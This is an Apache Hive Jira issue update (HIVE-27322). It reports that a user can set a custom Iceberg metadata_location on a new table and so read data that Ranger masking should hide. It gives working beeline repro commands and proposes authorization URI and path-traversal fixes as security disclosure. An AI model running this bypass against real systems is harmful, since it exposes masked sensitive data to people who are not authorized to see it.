[
https://issues.apache.org/jira/browse/HIVE-27322?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
]
Janos Kovacs updated HIVE-27322:
--------------------------------
Description:
Set to bug/blocker instead of enhancement due to its security related nature,
Hive4 should not be released w/o fix for this. Please reset if needed.
Context:
* There are some core tables with sensitive data that users can only query
with data masking enforced (e.g. via Ranger). Let's assume this is the
`default.icebergsecured` table.
* An end-user can only access the masked form of the sensitive data as
expected...
* The users also have privilege to create new tables in their own sandbox
databases - let's assume this is the `default.trojanhorse` table for now.
* The user can create a malicious table that exposes the sensitive data
non-masked leading to a possible data breach.
* Hive runs with doAs=false so that it can enforce FGAC and end users need no
direct file-system access.
Repro:
* First make sure the data is secured by the masking policy:
{noformat}
<kinit as privileged user>
beeline -e "
DROP TABLE IF EXISTS default.icebergsecured PURGE;
CREATE EXTERNAL TABLE default.icebergsecured (txt string, secret string) STORED BY ICEBERG;
INSERT INTO default.icebergsecured VALUES ('You might be allowed to see this.','You are NOT allowed to see this!');
"
<kinit as end user>
beeline -e "
SELECT * FROM default.icebergsecured;
"
+------------------------------------+--------------------------------+
|         icebergsecured.txt         |     icebergsecured.secret      |
+------------------------------------+--------------------------------+
| You might be allowed to see this.  | MASKED BY RANGER FOR SECURITY  |
+------------------------------------+--------------------------------+
{noformat}
* Now let the user create the malicious table exposing the sensitive data:
{noformat}
<kinit as end user>
SECURED_META_LOCATION=$(HADOOP_CLIENT_OPTS="-Djline.terminal=jline.UnsupportedTerminal" \
  beeline -e "DESCRIBE FORMATTED default.icebergsecured;" 2>/dev/null \
  | grep metadata_location | grep -v previous_metadata_location | awk '{print $5}')
beeline -e "
DROP TABLE IF EXISTS default.trojanhorse;
CREATE EXTERNAL TABLE default.trojanhorse (txt string, secret string) STORED BY
ICEBERG
TBLPROPERTIES (
'metadata_location'='${SECURED_META_LOCATION}');
SELECT * FROM default.trojanhorse;
"
+------------------------------------+-----------------------------------+
|          trojanhorse.txt           |        trojanhorse.secret         |
+------------------------------------+-----------------------------------+
| You might be allowed to see this.  | You are not allowed to see this!  |
+------------------------------------+-----------------------------------+
{noformat}
Currently - after HIVE-26707 - the rwstorage authorization only has either the
dummy path or the explicit path set for uri:
{noformat}
Permission denied: user [oozie] does not have [RWSTORAGE] privilege on
[iceberg://default/trojanhorse?snapshot=%2Fwarehouse%2Ftablespace%2Fexternal%2Fhive%2Ftrojanhorse%2Fmetadata%2Fdummy.metadata.json]
Permission denied: user [oozie] does not have [RWSTORAGE] privilege on
[iceberg://default/trojanhorse?snapshot=%2Fwarehouse%2Ftablespace%2Fexternal%2Fhive%2Ficebergsecured%2Fmetadata%2F00001-f4c2a428-30ce-4afd-82ff-d46ecbf02244.metadata.json]
{noformat}
This can be used only to decide whether a user is allowed to create Iceberg
tables in certain databases with certain names, but controlling a table's
metadata location is hard in that form.
A change is required that takes the custom value from TBLPROPERTIES, if set,
and passes it to the Authorizer.
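To see what the authorizer is actually asked to check, the URI from the second error message above can be split and decoded. The following is a minimal Python sketch for illustration only, not Hive or Ranger code. The helper name `parse_rwstorage_uri` is hypothetical, and treating a file named `dummy.metadata.json` as the marker of a generated location is an assumption drawn from the two sample messages.

```python
from urllib.parse import unquote

def parse_rwstorage_uri(uri):
    """Split an iceberg:// authorization URI into its parts (hypothetical helper)."""
    prefix = "iceberg://"
    if not uri.startswith(prefix):
        raise ValueError("not an iceberg URI: " + uri)
    # Everything before the first "?" is <database>/<table>.
    resource, _, query = uri[len(prefix):].partition("?")
    database, _, table = resource.partition("/")
    # The location follows "snapshot=" and is URL-encoded.
    key, _, encoded = query.partition("=")
    if key != "snapshot":
        raise ValueError("unexpected query key: " + key)
    location = unquote(encoded)
    # Assumption: a generated (non-explicit) location ends in dummy.metadata.json.
    explicit = not location.endswith("/dummy.metadata.json")
    return database, table, location, explicit

uri = ("iceberg://default/trojanhorse?snapshot="
       "%2Fwarehouse%2Ftablespace%2Fexternal%2Fhive%2Ficebergsecured"
       "%2Fmetadata%2F00001-f4c2a428-30ce-4afd-82ff-d46ecbf02244.metadata.json")
database, table, location, explicit = parse_rwstorage_uri(uri)
print(database, table, explicit)
print(location)
```

The decoded location points into the `icebergsecured` table's directory even though the resource is `default/trojanhorse`, which is the mismatch a policy would need to catch.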
was:
Set to bug/blocker instead of enhancement due to its security related nature,
Hive4 should not be released w/o fix for this. Please reset if needed.
Context:
* There are some core tables with sensitive data that users can only query
with data masking enforced (e.g. via Ranger). Let's assume this is the
`default.icebergsecured` table.
* An end-user can only access the masked form of the sensitive data as
expected...
* The users also have privilege to create new tables in their own sandbox
databases - let's assume this is the `default.trojanhorse` table for now.
* The user can create a malicious table that exposes the sensitive data
non-masked leading to a possible data breach.
* Hive runs with doAs=false so that it can enforce FGAC and end users need no
direct file-system access.
Repro:
* First make sure the data is secured by the masking policy:
{noformat}
<kinit as privileged user>
beeline -e "
DROP TABLE IF EXISTS default.icebergsecured PURGE;
CREATE EXTERNAL TABLE default.icebergsecured (txt string, secret string) STORED BY ICEBERG;
INSERT INTO default.icebergsecured VALUES ('You might be allowed to see this.','You are NOT allowed to see this!');
"
<kinit as end user>
beeline -e "
SELECT * FROM default.icebergsecured;
"
+------------------------------------+--------------------------------+
|         icebergsecured.txt         |     icebergsecured.secret      |
+------------------------------------+--------------------------------+
| You might be allowed to see this.  | MASKED BY RANGER FOR SECURITY  |
+------------------------------------+--------------------------------+
{noformat}
* Now let the user create the malicious table exposing the sensitive data:
{noformat}
<kinit as end user>
SECURED_META_LOCATION=$(HADOOP_CLIENT_OPTS="-Djline.terminal=jline.UnsupportedTerminal" \
  beeline -e "DESCRIBE FORMATTED default.icebergsecured;" 2>/dev/null \
  | grep metadata_location | grep -v previous_metadata_location | awk '{print $5}')
beeline -e "
DROP TABLE IF EXISTS default.trojanhorse;
CREATE EXTERNAL TABLE default.trojanhorse (txt string, secret string) STORED BY
ICEBERG
TBLPROPERTIES (
'metadata_location'='${SECURED_META_LOCATION}');
SELECT * FROM default.trojanhorse;
"
+------------------------------------+-----------------------------------+
|          trojanhorse.txt           |        trojanhorse.secret         |
+------------------------------------+-----------------------------------+
| You might be allowed to see this.  | You are not allowed to see this!  |
+------------------------------------+-----------------------------------+
{noformat}
Currently - after HIVE-26707 - the rwstorage authorization only has either the
dummy path or the explicit path set for uri:
{noformat}
Permission denied: user [oozie] does not have [RWSTORAGE] privilege on
[iceberg://default/trojanhorse?snapshot=%2Fwarehouse%2Ftablespace%2Fexternal%2Fhive%2Ftrojanhorse%2Fmetadata%2Fdummy.metadata.json]
Permission denied: user [oozie] does not have [RWSTORAGE] privilege on
[iceberg://default/trojanhorse?snapshot=%2Fwarehouse%2Ftablespace%2Fexternal%2Fhive%2Ficebergsecured%2Fmetadata%2F00001-f4c2a428-30ce-4afd-82ff-d46ecbf02244.metadata.json]
{noformat}
This can be used only to decide whether a user is allowed to create Iceberg
tables in certain databases with certain names, but controlling a table's
metadata location is hard in that form:
* it does not provide a variable of "default table location" so a rule needs
to know the per-database table location or per-catalog warehouse location to be
able to construct it
* it does not provide a rich regex to filter out `/../` style directory
references
* it has no flag indicating whether an explicit metadata location was provided
instead of the dummy reference, so the policy needs explicit matching to
handle that case
Proposed enhancement:
* The URL for the Iceberg table's rwstorage authorization should be changed
in the following way:
** the <database>/<table>?<location> is good but
*** the location should not be url encoded, or at least the authorizer should
check the policy against the decoded url
*** the separator between the table and location should be "/" instead of "?"
as "?" might be mixed with its regex meaning!
*** "/" as separator can be also confusing as the absolute paths would start
with it. Might be that another separator character that does not conflict with
regex, paths and table-name valid characters would be even better.
** the "snapshot=" seems to be non-relevant in this context, it should not be
part of the <location>
** There is a need to differentiate the cases where location is only generated
or when location is explicitly provided by end user. For this, the "default"
location might just not be generated as path but replaced with
"default_location" fixed value - note! it has no leading "/". That way a single
policy definition could be used to cover all tables in their default locations
like:
{noformat}
iceberg://mydatabase/*/default_location or
iceberg://mydatabase/*/snapshot=default_location{noformat}
*** "default" here means the table's default location which can depend on the
warehouse location, the database location and the table's explicit location
*** I know many developers don't like this type of hardcoded static value,
but with such a value there is no need to modify the rwstorage authorization
(and we are already using a similar method for the "METASTORE" type of
storagehandler authorization)
* The authorization request should include the rwstorage authorization only if
the CREATE/ALTER/DROP is against the Iceberg table, and not if the Iceberg
table is only a source in such statements. This might already be fixed via
HIVE-27304.
* When any custom Iceberg metadata.json location is provided, the
<location> must contain the provided path so that it can be properly authorized.
* We should either not allow the back-step "/../" in any location or give an
option to filter it out in the final authorization step.
For example, a policy on
{noformat}
iceberg://mydatabase/mytable//data/use-case-1/* or
iceberg://mydatabase/mytable/snapshot=/data/use-case-1/*{noformat}
should not match access for
{noformat}
iceberg://mydatabase/mytable//data/use-case-1/../use-case-2/* or
iceberg://mydatabase/mytable/snapshot=/data/use-case-1/../use-case-2/*{noformat}
** Not allowing "/../" might be easier to handle on the Hive/Impala side.
** "/../" might still be valid if it is used within an allowed location, but
users should simply use a proper location without "/../".
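The "/../" concern can be illustrated with a short Python sketch. It is an illustration only and does not reflect how Hive or Ranger match policies. It assumes a hypothetical helper, `location_allowed`, that rejects any location containing a ".." segment before comparing it with the policy path, which corresponds to the stricter of the two options above.

```python
import posixpath
from fnmatch import fnmatchcase

def location_allowed(policy_pattern, location):
    """Return True if location matches policy_pattern and has no '..' segment."""
    # Stricter option: refuse back-steps outright instead of resolving them.
    if ".." in location.split("/"):
        return False
    return fnmatchcase(location, policy_pattern)

policy = "/data/use-case-1/*"
inside = "/data/use-case-1/tbl/metadata/v1.metadata.json"
escaping = "/data/use-case-1/../use-case-2/tbl/metadata/v1.metadata.json"

print(location_allowed(policy, inside))    # True
print(location_allowed(policy, escaping))  # False

# A plain wildcard match alone would accept the escaping path:
print(fnmatchcase(escaping, policy))       # True

# Normalizing shows where that path really points:
print(posixpath.normpath(escaping))
```

Resolving the path with `posixpath.normpath` and then matching would be the more permissive alternative; the sketch rejects the segment instead because that is simpler to reason about in a policy.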
With the above changes, a single new default Ranger policy could be used to
globally enable the creation of Iceberg tables in any database and any table
location, but NOT with any custom metadata location (for users who do not
want to globally turn storagehandler authorization off via
hive.security.authorization.tables.on.storagehandlers=false because of other
handlers such as HBase or Kafka):
{noformat}
iceberg://*/*/default_location or
iceberg://*/*/snapshot=default_location {noformat}
Note that there is no extra "/" in front of "default_location", only the
separator character in the first case
Also with the above changes we could allow users to configure authorizations
for custom/shared data location via:
{noformat}
iceberg://mydatabase/*//some/shared/table/location/* or
iceberg://mydatabase/*/snapshot=/some/shared/table/location/* {noformat}
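How the proposed "/"-separated form could be evaluated is sketched below in Python. This is a hedged illustration of the proposal, not existing Hive or Ranger behavior: the helpers `split_resource` and `policy_matches` are hypothetical, the sample database and table names are made up, and "/../" handling is deliberately left out.

```python
from fnmatch import fnmatchcase

PREFIX = "iceberg://"

def split_resource(uri):
    """Split 'iceberg://<db>/<table>/<location>' into [db, table, location]."""
    if not uri.startswith(PREFIX):
        raise ValueError("not an iceberg URI: " + uri)
    # Split on the first two "/" only, so an absolute location keeps its leading "/".
    parts = uri[len(PREFIX):].split("/", 2)
    if len(parts) != 3:
        raise ValueError("expected <db>/<table>/<location>: " + uri)
    return parts

def policy_matches(policy, request):
    """Match part by part so a '*' for database or table never spans the location."""
    pairs = zip(split_resource(policy), split_resource(request))
    return all(fnmatchcase(value, pattern) for pattern, value in pairs)

default_policy = "iceberg://*/*/default_location"
shared_policy = "iceberg://mydatabase/*//some/shared/table/location/*"

# Any table in its default location is covered by the global policy.
print(policy_matches(default_policy, "iceberg://sandbox/t1/default_location"))

# A custom metadata location is not covered by the global policy.
print(policy_matches(
    default_policy,
    "iceberg://sandbox/trojanhorse//warehouse/hive/icebergsecured/metadata/x.metadata.json"))

# The shared-location policy covers only its own database and path prefix.
print(policy_matches(
    shared_policy,
    "iceberg://mydatabase/t2//some/shared/table/location/t2/metadata/v1.metadata.json"))
```

Matching the three parts separately is a design choice of this sketch: a single wildcard match over the whole string would let "*" in the table position absorb path separators and accept locations the policy author did not intend.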
> Iceberg: metadata location overrides can cause data breach - custom location
> to AuthZ
> -------------------------------------------------------------------------------------
>
> Key: HIVE-27322
> URL: https://issues.apache.org/jira/browse/HIVE-27322
> Project: Hive
> Issue Type: Sub-task
> Components: Iceberg integration
> Affects Versions: 4.0.0-alpha-2
> Reporter: Janos Kovacs
> Assignee: Ayush Saxena
> Priority: Blocker
> Labels: check, pull-request-available
> Fix For: 4.0.0
>
--
This message was sent by Atlassian Jira
(v8.20.10#820010)